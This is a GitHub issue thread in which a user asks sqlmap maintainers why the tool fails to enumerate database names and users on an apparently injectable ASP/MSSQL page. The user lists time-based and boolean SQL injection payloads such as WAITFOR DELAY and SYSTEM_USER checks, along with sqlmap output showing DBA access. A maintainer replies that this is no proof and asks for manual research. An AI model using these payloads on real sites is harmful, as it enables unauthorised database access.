### ISSUE TITLE
[CRITICAL] unable to retrieve the database names/users

### ISSUE THREAD

**Issue by Comancheroo** [sqlmapproject/sqlmap#2098]
Hi,

I found a sqli vulnerability but SQLMap gives the following error;
[CRITICAL] unable to retrieve the database names
[CRITICAL] unable to retrieve the database users

I've tried --hex and --no-cast. Same result.
--banner comment results.
banner : None

I tried the tamper script: between and space2mssqlblank. Same result.

MANUEL TESTS.
http://site.com/alfa.asp?romeo=2 IF SYSTEM_USER='**sa**' WAITFOR DELAY '00:00:3'-- **TRUE.**
http://site.com/alfa.asp?romeo=2 IF SYSTEM_USER='**ka**' WAITFOR DELAY '00:00:3'-- FALSE.

http://site.com/alfa.asp?romeo=2;WAITFOR DELAY '0:0:5'-- TRUE.
http://site.com/alfa.asp?romeo=2 IF (LEN(USER)=3) WAITFOR DELAY '00:00:3'-- TRUE.
http://site.com/alfa.asp?romeo=2 IF (LEN(USER)=3) WAITFOR DELAY '00:00:3'-- FALSE.
http://site.com/alfa.asp?romeo=2 AND 1=1-- TRUE
http://site.com/alfa.asp?romeo=2 AND 1=2-- FALSE

**--is-dba** tests.
Parameter: romeo (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: romeo=2; WAITFOR DELAY '0:0:5'--

[INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[INFO] testing if current user is DBA
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
**## current user is DBA:    True**

And I tested on wafw00f and system don't use the common WAF.
Thanks.

**Comment by stamparm** [comment]
Getting a `current user is DBA: True` with the time-based SQLi, especially in case where there could be a (non-common WAF) is not a proof for anything.

Please, research manually what is going on and report back. Put yourself in my position and let me know what would you do? If I don't have any kind of useful information then there is nothing to discuss.

**Comment by stamparm** [comment]
p.s. please people, do a manual assessment, find out what is going on and report back with something useful. Raising sqlmap issues in cases when there is a potential protection at the other side is not helping the project
